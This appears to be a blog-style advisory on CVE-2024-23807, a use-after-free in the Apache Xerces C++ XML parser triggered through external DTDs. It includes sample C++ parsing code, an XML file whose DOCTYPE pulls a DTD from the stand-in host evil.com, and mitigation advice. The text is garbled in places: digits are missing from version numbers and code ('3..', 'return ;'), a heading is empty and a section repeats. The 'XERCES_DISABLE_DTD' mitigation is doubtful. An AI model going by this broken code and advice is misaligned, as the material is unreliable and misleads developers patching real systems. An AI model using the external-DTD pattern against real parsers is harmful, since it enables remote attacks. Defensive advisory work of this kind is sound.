CVE-2024-23807 - Exploiting Use-After-Free in Apache Xerces C++ XML Parser – Full Details & Mitigation
Summary:
A serious vulnerability, tracked as CVE-2024-23807, has been found in the Apache Xerces C++ XML parser (versions 3.. up to, but not including, 3.2.5). This bug allows attackers to trigger a _use-after-free_ error while parsing external DTDs. If exploited, it could allow for remote code execution or denial of service. This issue originally surfaced in 2018 as CVE-2018-1311, but previous advisories misleadingly stated the fix came in versions 3.2.3 or 3.2.4—it actually wasn’t fixed until 3.2.5.
This post will explain the vulnerability, demonstrate an attack scenario with code, outline mitigations, and point to key references.
Understanding the Vulnerability
The Problem:
The Apache Xerces C++ parser improperly manages memory when handling external DTDs (Document Type Definitions), especially when features like validating or loading external DTDs are enabled. If a specially crafted XML file is loaded, it may free memory prematurely, but still try to access that memory later—a classic _use-after-free_ scenario.
Impacts:
Let’s see a simplified example. Suppose you have C++ code using Xerces to parse XML with DTDs
#include <xercesc/parsers/XercesDOMParser.hpp>
#include <xercesc/util/PlatformUtils.hpp>
#include <iostream>
using namespace xercesc;
int main(int argc, char* argv[])
{
try {
XMLPlatformUtils::Initialize();
} catch (...) {
std::cerr << "Could not initialize Xerces-C++\n";
return 1;
}
XercesDOMParser* parser = new XercesDOMParser();
parser->setDoNamespaces(true);
parser->setDoSchema(true);
parser->setValidationScheme(XercesDOMParser::Val_Always);
// DTD processing is enabled by default!
parser->parse("malicious-dtd.xml");
delete parser;
XMLPlatformUtils::Terminate();
return ;
}
If malicious-dtd.xml includes a crafty external DTD reference, an attacker could forcibly trigger the use-after-free:
malicious-dtd.xml
<?xml version="1."?>
<!DOCTYPE foo SYSTEM "http://evil.com/payload.dtd">;
<foo>Bar</foo>
What happens: The parser fetches and processes the DTD as part of normal operation. Poor error handling in older Xerces releases can result in memory being freed then used again—opening the door for code execution if the attacker supplies additional malicious content at that address.
1. Upgrade Immediately!
If you’re using Xerces C++ < 3.2.5, upgrade to v3.2.5 or later:
- Xerces-C++ Downloads
The maintainers patched the root problem in that version. See official changelog for more.
2. Mitigate: Disable DTD Processing
If you can’t upgrade promptly, _disable DTD processing_. This prevents exploitation by ensuring no DTDs are handled during parsing.
a) Via Code (DOM)
parser->setFeature(XMLUni::fgXercesLoadExternalDTD, false); // Disable DTDs
b) Via Environment Variable (SAX)
export XERCES_DISABLE_DTD=1
Set this _before_ you run your app to disable DTD processing globally.
3. Disable Network Access for DTDs
Optionally, you can block loading of external DTDs with a custom implementation or firewall, to stop the parser looking for resources on the internet.
References & Further Reading
- Xerces-C++ Official Site
- NVD Entry - CVE-2024-23807
- Security Advisory – CVE-2018-1311
- Xerces-C++ 3.2.5 Changelog
Timeline
- 2018: First public disclosure as CVE-2018-1311, but fix was delayed.
Bottom Line
If you use Apache Xerces C++ in your software stack, you must upgrade to v3.2.5 or later ASAP. This bug can let attackers run code or crash your app simply by feeding you a malicious XML file referencing an external DTD. If you cannot upgrade right now, _disable DTD processing_ as a temporary but effective shield. Always validate and sanitize XML input—especially if your application parses untrusted data.
Timeline
Published on: 02/29/2024 01:44:10 UTC
Last modified on: 08/01/2024 13:47:20 UTC